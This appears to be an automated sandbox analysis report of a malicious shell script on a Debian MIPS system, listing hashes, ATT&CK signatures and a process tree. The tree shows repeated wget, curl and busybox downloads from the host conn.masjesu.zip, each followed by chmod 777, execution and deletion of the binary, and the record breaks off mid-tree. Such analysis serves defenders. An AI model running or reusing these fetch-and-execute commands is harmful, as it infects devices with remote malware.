7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e

Analysis

max time kernel
72s
max time network
74s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21-11-2024 06:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
Size

10KB
MD5

7af7e75bfec2bdec706e7d434b5662cf
SHA1

041c56f201a42abf891e2e8ee49ba76dfcfadcf1
SHA256

7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e
SHA512

f5b5ca144915eefac919f16fb97e39a47efc3be62201705eeaf56f25b7afcb7a20b96db3ba94989510ad07f54ba014f2f9df00f0f1a3e48a780f11f35861f7c2
SSDEEP

192:h0wtGG2kARmOJPzH+2IJ7O5BUD+u0ThdKKRYSb8UYB+G1UYB+Gn0wtGG4kARmOB8:6kARmOJPzH+xJ7MfTDb8UYB+G1UYB+GF

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
800	chmod
923	chmod
972	chmod
1007	chmod
874	chmod
902	chmod
909	chmod
944	chmod
1014	chmod
747	chmod
827	chmod
937	chmod
820	chmod
862	chmod
888	chmod
895	chmod
958	chmod
951	chmod
986	chmod
769	chmod
930	chmod
979	chmod
993	chmod
1000	chmod
754	chmod
881	chmod
916	chmod
965	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
766	busybox
847	curl
929	busybox
947	wget
961	wget
908	busybox
950	busybox
751	curl
826	busybox
868	curl
891	wget
894	busybox
905	wget
989	wget
1013	busybox
723	wget
794	busybox
884	wget
940	wget
964	busybox
982	wget
753	busybox
806	wget
968	wget
969	curl
823	wget
824	curl
867	wget
962	curl
975	wget
1004	curl
742	curl
750	wget
899	curl
922	busybox
985	busybox
757	wget
815	curl
885	curl
926	wget
898	wget
901	busybox
906	curl
915	busybox
936	busybox
990	curl
1003	wget
830	wget
880	busybox
892	curl
927	curl
978	busybox
996	wget
877	wget
920	curl
971	busybox
983	curl
1011	curl
1010	wget
746	busybox
819	busybox
870	busybox
887	busybox
954	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	curl
File opened for modification	/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	curl
File opened for modification	/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	curl
File opened for modification	/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	curl
File opened for modification	/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	curl
File opened for modification	/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	curl
File opened for modification	/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	curl
File opened for modification	/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	curl
File opened for modification	/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	curl
File opened for modification	/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	curl
File opened for modification	/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	curl
File opened for modification	/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	curl
File opened for modification	/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	curl
File opened for modification	/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	curl
File opened for modification	/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	curl
File opened for modification	/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	curl
File opened for modification	/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	curl
File opened for modification	/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	curl
File opened for modification	/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	curl
File opened for modification	/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	curl
File opened for modification	/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	curl
File opened for modification	/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	curl
File opened for modification	/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	curl
File opened for modification	/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	curl
File opened for modification	/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	curl
File opened for modification	/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	curl
File opened for modification	/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	curl
File opened for modification	/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	curl

/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
1⤵
PID:714
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:717
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - System Network Configuration Discovery
  PID:723
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:742
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - System Network Configuration Discovery
  PID:746
- /bin/chmod
  chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  ./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/rm
  rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  PID:749
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - System Network Configuration Discovery
  PID:750
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:751
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - System Network Configuration Discovery
  PID:753
- /bin/chmod
  chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  ./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  PID:756
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - System Network Configuration Discovery
  PID:757
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:758
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - System Network Configuration Discovery
  PID:766
- /bin/chmod
  chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  ./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Executes dropped EXE
  PID:771
- /bin/rm
  rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  PID:774
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:787
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - System Network Configuration Discovery
  PID:794
- /bin/chmod
  chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  ./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Executes dropped EXE
  PID:801
- /bin/rm
  rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:804
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:806
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:815
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:819
- /bin/chmod
  chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  ./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Executes dropped EXE
  PID:821
- /bin/rm
  rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  PID:822
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - System Network Configuration Discovery
  PID:823
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:824
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - System Network Configuration Discovery
  PID:826
- /bin/chmod
  chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  ./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Executes dropped EXE
  PID:828
- /bin/rm
  rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  PID:829
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - System Network Configuration Discovery
  PID:830
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:847
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:856
- /bin/chmod
  chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  ./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/rm
  rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:866
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:867
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:870
- /bin/chmod
  chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  ./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  PID:876
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:877
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:880
- /bin/chmod
  chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  ./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:887
- /bin/chmod
  chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  ./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - System Network Configuration Discovery
  PID:891
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - System Network Configuration Discovery
  PID:894
- /bin/chmod
  chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  ./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  PID:897
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:898
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:901
- /bin/chmod
  chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  ./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  PID:904
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:905
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:908
- /bin/chmod
  chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  ./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - System Network Configuration Discovery
  PID:915
- /bin/chmod
  chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  ./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:918
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  PID:919
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:922
- /bin/chmod
  chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  ./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  PID:925
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - System Network Configuration Discovery
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - System Network Configuration Discovery
  PID:929
- /bin/chmod
  chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  ./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:932
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  PID:933
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - System Network Configuration Discovery
  PID:936
- /bin/chmod
  chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  ./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  PID:943
- /bin/chmod
  chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  ./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  PID:946
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - System Network Configuration Discovery
  PID:947
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - System Network Configuration Discovery
  PID:950
- /bin/chmod
  chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  ./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  PID:953
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - System Network Configuration Discovery
  PID:954
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:957
- /bin/chmod
  chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  ./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:960
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:961
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:964
- /bin/chmod
  chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  ./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
  rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  PID:967
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - System Network Configuration Discovery
  PID:968
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:969
- /bin/busybox
